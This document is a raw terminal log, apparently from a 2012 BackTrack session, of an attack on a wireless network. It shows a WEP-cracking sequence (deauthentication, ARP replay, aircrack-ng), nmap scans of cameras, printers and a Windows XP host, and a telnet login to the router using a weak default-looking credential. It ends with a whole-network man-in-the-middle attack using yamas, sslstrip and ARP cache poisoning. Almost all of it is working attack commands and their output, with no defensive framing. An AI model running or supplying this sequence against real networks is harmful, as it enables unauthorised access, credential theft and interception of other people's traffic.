airodump-ng wlan0
airodump-ng --bssid E0:90:53:4A:68:AA -c 6 -w wlan_be wlan0
aireplay-ng -1 0 -a E0:90:53:4A:68:AA -h 00:11:22:33:44:55 -e WLAN_BE wlan0
aireplay-ng -3 0 -b E0:90:53:4A:68:AA -h 00:11:22:33:44:55 wlan0
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
aircrack-ng wlan_be.cap
ifconfig
nmap -sP 192.168.1.1-255
[email protected]:~# nmap -sP 192.168.1.1-255
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 15:01 CEST
Nmap scan report for 192.168.1.1
Host is up (0.011s latency).
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Nmap scan report for 192.168.1.10
Host is up (0.033s latency).
MAC Address: 00:1B:11:01:30:95 (D-Link)
Nmap scan report for 192.168.1.13
Host is up (0.0060s latency).
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Nmap scan report for 192.168.1.14
Host is up (0.071s latency).
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Nmap scan report for 192.168.1.15
Host is up (0.54s latency).
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Nmap scan report for 192.168.1.16
Host is up (0.17s latency).
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Nmap scan report for 192.168.1.17
Host is up (0.17s latency).
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Nmap scan report for 192.168.1.18
Host is up (0.092s latency).
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Nmap scan report for 192.168.1.19
Host is up (0.32s latency).
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Nmap scan report for 192.168.1.20
Host is up (0.53s latency).
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Nmap scan report for 192.168.1.33
Host is up (0.0037s latency).
MAC Address: 00:26:24:75:5B:6F (Thomson)
Nmap scan report for 192.168.1.34
Host is up (0.0032s latency).
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Nmap scan report for 192.168.1.36
Host is up (0.0079s latency).
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Nmap scan report for 192.168.1.38
Host is up (0.25s latency).
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Nmap scan report for 192.168.1.129
Host is up.
Nmap done: 255 IP addresses (15 hosts up) scanned in 14.13 seconds
[email protected]:~# nmap -sV -A 192.168.1.1
Nmap scan report for 192.168.1.1
Host is up (0.0065s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Xavi 7768 WAP ftpd 1.00
23/tcp open telnet Zoom X6 ADSL router telnetd
53/tcp open tcpwrapped
80/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
2800/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
8008/tcp open upnp Conexant-EmWeb 6.1.0 (UPnP 1.0)
MAC Address: E0:91:53:4A:27:BE (XAVi Technologies)
Device type: broadband router|WAP
Running: Allied Data embedded, Belkin embedded, Intracom embedded, Iskratel embedded
OS details: Broadband router (Allied Data CopperJet, Belkin F5D7632-4, Intracom Jetspeed 500i, or Iskratel Sinope568 or Proteus932)
Network Distance: 1 hop
Service Info: Devices: WAP, broadband router
TRACEROUTE
HOP RTT ADDRESS
1 6.45 ms 192.168.1.1
[email protected]:~# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
[ASCII-art banner]
Login: 1234
Password: ****
Login successful
-->
802.1x            802.1x port based authentication
acl               snmp remote management
agent             Get a file from a remote host
ald               Configuration commands for ald
bridge            Configure layer 2 bridge
classifier        Packet classifier configuration commands
console           Console access
dhcpclient        DHCP client configuration commands
dhcpserver        DHCP server configuration commands
dnsclient         DNS client configuration commands
dnsrelay          DNS relay configuration
emux              Ethernet Switch Multiplex configuration commands
ethernet          Commands to configure ethernet transports
firewall          Firewall configuration commands
fullConeNat       Full Cone NAT configuration commands
help              Top level CLI help
igmp              igmp configuration commands
imdebug           Directly access the information model
ip                Configure IP router
lan
logger            Log to a remote host using syslog
meter             Packet metering configuration command
nat               NAT configuration commands
port              Physical port configuration commands
pppoa             PPP over ATM configuration
pppoe             PPP over Ethernet Configuration
reboot            reboot modem
restore_defaults  set all configuration to factory setting
rfc1483           Commands to configure RFC1483 transports
save_and_exit     SAVES changes closing telnet session
save_and_reboot   SAVES changes and reboots modem.
save_config       Save configuration
scheduler         Configuration commands for scheduler
security          Security configuration commands not specific to NAT or firewall
simpleconfig      SimpleConfig Configuration commands
sntpclient        Simple Network Time Protocol Client commands
stop
system            System administration commands
transports        Transport configuration commands
upnp              UPnP configuration commands
user              User commands
wanacl            snmp remote management
webserver         Webserver configuration commands
wpa               Configure WPA (Wireless Protected Access)
zipb              Configure Dynamic ZIPB mode
-->
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.13
Host is up (0.0076s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
554/tcp open rtsp?
| rtsp-methods:
|_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1501/tcp open sas-3?
MAC Address: 00:13:46:DB:B7:5C (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera
TRACEROUTE
HOP RTT ADDRESS
1 7.56 ms 192.168.1.13
[email protected]:~# nmap -sV -A 192.168.1.14
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.14
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Openwall GNU/*/Linux telnetd
554/tcp open rtsp?
| rtsp-methods:
|_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
MAC Address: 00:13:46:DC:2D:60 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux
TRACEROUTE
HOP RTT ADDRESS
1 281.05 ms 192.168.1.14
[email protected]:~# nmap -sV -A 192.168.1.15
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.15
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp GNU Inetutils FTPd 1.4.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open telnet Openwall GNU/*/Linux telnetd
554/tcp open rtsp?
| rtsp-methods:
|_ OPTIONS, DESCRIBE, PLAY, SETUP, TEARDOWN
1503/tcp open imtc-mcs?
MAC Address: 00:1C:F0:78:81:83 (D-Link)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:kernel:2.4
OS details: Linux 2.4.18 - 2.4.35 (likely embedded)
Network Distance: 1 hop
Service Info: Host: Network-Camera; OS: Linux
TRACEROUTE
HOP RTT ADDRESS
1 113.45 ms 192.168.1.15
[email protected]:~# nmap -sV -A 192.168.1.16
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.16
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
443/tcp open ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.16:443/home.htm
MAC Address: F0:7D:68:05:A6:D0 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 271.54 ms 192.168.1.16
[email protected]:~# nmap -sV -A 192.168.1.17
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.17
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
443/tcp open ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.17:443/home.htm
MAC Address: F0:7D:68:0A:87:5A (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 336.91 ms 192.168.1.17
nmap -sV -A 192.168.1.18
Starting Nmap 5.61TEST4 ( http://nmap.org )
Nmap scan report for 192.168.1.18
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
443/tcp open ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
|_http-title: Requested resource was https://192.168.1.18:443/home.htm and no page was returned.
MAC Address: F0:7D:68:0A:87:49 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 338.75 ms 192.168.1.18
[email protected]:~# nmap -sV -A 192.168.1.19
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.19
Host is up (0.66s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
443/tcp open ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.19:443/home.htm
MAC Address: F0:7D:68:0A:86:C8 (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 655.43 ms 192.168.1.19
[email protected]:~# nmap -sV -A 192.168.1.20
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.20
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
443/tcp open ssl/http GoAhead-Webs embedded httpd
| ssl-cert: Subject: organizationName=D-LINK/stateOrProvinceName=Taiwan/countryName=TW
| Not valid before: 2010-02-05 08:14:40
|_Not valid after: 2015-02-04 08:14:40
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-title: Document Error: Unauthorized
|_Requested resource was https://192.168.1.20:443/home.htm
MAC Address: F0:7D:68:0A:85:4B (D-Link)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.13 - 2.6.31
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 360.67 ms 192.168.1.20
[email protected]:~# nmap -sV -A 192.168.1.33
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:10 CEST
Nmap scan report for 192.168.1.33
Host is up (0.0045s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Virata-EmWeb 6.2.1
|_http-title: HP Photosmart Wireless B109n-z
139/tcp open tcpwrapped
445/tcp open netbios-ssn
6839/tcp open tcpwrapped
7435/tcp open tcpwrapped
8080/tcp open http-proxy?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
9110/tcp open unknown
9220/tcp open hp-gsg HP Generic Scan Gateway 1.0
9290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway
9500/tcp open ismserver?
MAC Address: F4:CE:46:EE:2C:E2 (Hewlett-Packard Company)
Device type: printer
Running: HP embedded
OS details: HP PhotoSmart C390 or C4780, or Officejet 7000 printer, HP printer: Photosmart 4300-, 6500-, 7200-, or 8100-series, or Officejet 6000-series
Network Distance: 1 hop
Service Info: Device: printer
Host script results:
|_nbstat: NetBIOS name: HPF4CE46EE2CE2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
TRACEROUTE
HOP RTT ADDRESS
1 4.55 ms 192.168.1.33
[email protected]:~# nmap -sV -A 192.168.1.34
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.34
Host is up (0.0029s latency).
Not shown: 990 filtered ports
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
139/tcp open netbios-ssn
427/tcp closed svrloc
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
700/tcp open tcpwrapped
1073/tcp open tcpwrapped
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
6000/tcp open X11?
8000/tcp open http-alt?
8001/tcp open vcom-tunnel?
MAC Address: 00:10:DC:E4:EE:C0 (Micro-star International CO.)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (98%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows XP Professional SP2 (firewall enabled) (98%), Microsoft Windows Small Business Server 2003 (98%), Microsoft Windows XP SP2 (94%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP SP3 (93%), Microsoft Windows XP Embedded SP2 (92%), Microsoft Windows XP SP2 or SP3 (92%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (90%), Microsoft Windows Server 2003 SP1 or SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: JACOBO, NetBIOS user: <unknown>, NetBIOS MAC: 00:10:dc:e4:ee:c0 (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: Jacobo
| NetBIOS computer name: JACOBO
| Workgroup: DEVO
|_ System time: 2012-06-21 21:22:21 UTC+1
TRACEROUTE
HOP RTT ADDRESS
1 2.94 ms 192.168.1.34
[email protected]:~# nmap -sV -A 192.168.1.36
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:43 CEST
Nmap scan report for 192.168.1.36
Host is up (0.033s latency).
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
80/tcp open http?
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp open tcpwrapped
445/tcp open netbios-ssn
631/tcp open ipp?
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
6839/tcp open tcpwrapped
7435/tcp open tcpwrapped
8080/tcp open http-proxy?
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
9110/tcp open unknown
9111/tcp open DragonIDSConsole?
9220/tcp open hp-gsg HP Generic Scan Gateway 1.0
9290/tcp open hp-gsg IEEE 1284.4 scan peripheral gateway
9500/tcp open ismserver?
MAC Address: 9C:8E:99:33:4D:F0 (Hewlett-Packard Company)
Device type: printer|power-device
Running: HP embedded, HP VxWorks, MGE embedded
OS CPE: cpe:/o:hp:vxworks
OS details: HP LaserJet CM1312 or Photosmart C510a printer, VxWorks: HP printer or MGE MX 5000 RT UPS
Network Distance: 1 hop
Service Info: Device: printer
Host script results:
|_nbstat: NetBIOS name: HP9C8E99334DF0, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
TRACEROUTE
HOP RTT ADDRESS
1 33.32 ms 192.168.1.36
nmap -sV -A 192.168.1.38
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-21 20:55 CEST
Nmap scan report for 192.168.1.38
Host is up (0.49s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
2869/tcp closed icslap
2968/tcp open enpp?
MAC Address: 00:1F:1F:48:55:80 (Edimax Technology Co.)
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows XP|98|2000|NT|2003|PocketPC/CE (94%), HTC Windows PocketPC/CE (91%), Sony Ericsson Symbian OS 9.X (88%), Ness embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_98 cpe:/o:htc:windows_ce cpe:/o:microsoft:windows_2000::sp1 cpe:/o:microsoft:windows_nt cpe:/o:microsoft:windows_server_2003 cpe:/o:sonyericsson:symbian_os:9 cpe:/o:microsoft:windows_ce
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows 98 SE (92%), Microsoft Windows XP SP2 (91%), HTC Touch mobile phone (Windows Mobile 6) (91%), Microsoft Windows 98 (91%), Microsoft Windows XP Home SP2 (91%), Microsoft Windows XP Professional SP2 (91%), Microsoft Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP1 (90%), Microsoft Windows NT 4.0 SP5 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 486.83 ms 192.168.1.38
nmap -sV -A 192.168.1.10
Starting Nmap 5.61TEST4
Nmap scan report for 192.168.1.10
Host is up (0.0072s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
23/tcp open telnet D-Link Access Point telnetd
80/tcp open tcpwrapped
443/tcp open tcpwrapped
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW
| Not valid before: 2004-07-12 09:02:20
|_Not valid after: 2024-07-12 09:02:20
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
MAC Address: 00:1B:11:01:30:95 (D-Link)
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer
Network Distance: 1 hop
Service Info: Device: router
TRACEROUTE
HOP RTT ADDRESS
1 7.18 ms 192.168.1.10
[email protected]:~# nmap 239.255.255.250
Starting Nmap 5.61TEST4
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds
/pentest/enumeration/miranda
upnp> msearch
Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...
****************************************************************
SSDP reply message from 192.168.1.17:8838
XML file is located at http://192.168.1.17:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.16:8156
XML file is located at http://192.168.1.16:8156/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.20:8838
XML file is located at http://192.168.1.20:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.19:8838
XML file is located at http://192.168.1.19:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.1:2800
XML file is located at http://192.168.1.1:2800/WFADevice.xml
Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.15:11993
XML file is located at http://192.168.1.15:11993/description.xml
Device is running Embedded UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.18:8838
XML file is located at http://192.168.1.18:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************
****************************************************************
SSDP notification message from 192.168.1.13:10242
XML file is located at http://192.168.1.13:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************
****************************************************************
SSDP reply message from 192.168.1.14:10242
XML file is located at http://192.168.1.14:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************
upnp> host list
 [0] 192.168.1.17:8838
 [1] 192.168.1.16:8156
 [2] 192.168.1.20:8838
 [3] 192.168.1.19:8838
 [4] 192.168.1.1:2800
 [5] 192.168.1.15:11993
 [6] 192.168.1.18:8838
 [7] 192.168.1.13:10242
 [8] 192.168.1.14:10242
[email protected]:~# yamas
No update available
Script is installed
[ASCII-art banner]
============================================================================
= Welcome to Yet Another MITM Automation Script. =
= Use this tool responsibly, and enjoy! =
= Feel free to contribute and distribute this script as you please. =
= Official thread : http://tinyurl.com/yamas-bt5 =
= Check out the help (-h) to see new features and informations =
= You are running version 20120213 =
============================================================================
Message of the day :
Reviewing some code...
Could someone send me a complete log file? I'm planning on making a better parsing.
On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.
Please make sure to check out my last project : http://msimdb.comax.fr
 [+] Cleaning iptables
 [-] Cleaned.
 [+] Activating IP forwarding...
 [-] Activated.
 [+] Configuring iptables...
 To what port should the traffic be redirected to? (default = 8080)
Port 8080 selected as default.
 From what port should the traffic be redirected to? (default = 80)
Port 80 selected as default.
 Traffic from port 80 will be redirected to port 8080
 [-] Traffic rerouted
 [+] Activating sslstrip...
 Choose filename to output : (default = yamas)
wlan_ed
 Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txt
sslstrip 0.9 by Moxie Marlinspike running...
 [-] Sslstrip is running.
 [+] Activating ARP cache poisoning...
 Gateway : 192.168.1.1 Interface : wlan0
Enter IP gateway adress or press enter to use 192.168.1.1.
192.168.1.1 selected as default.
What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.
wlan0 selected as default.
We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
Press enter to default.
 Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched. Keep new window(s) running.
 Attack should be running smooth, enjoy.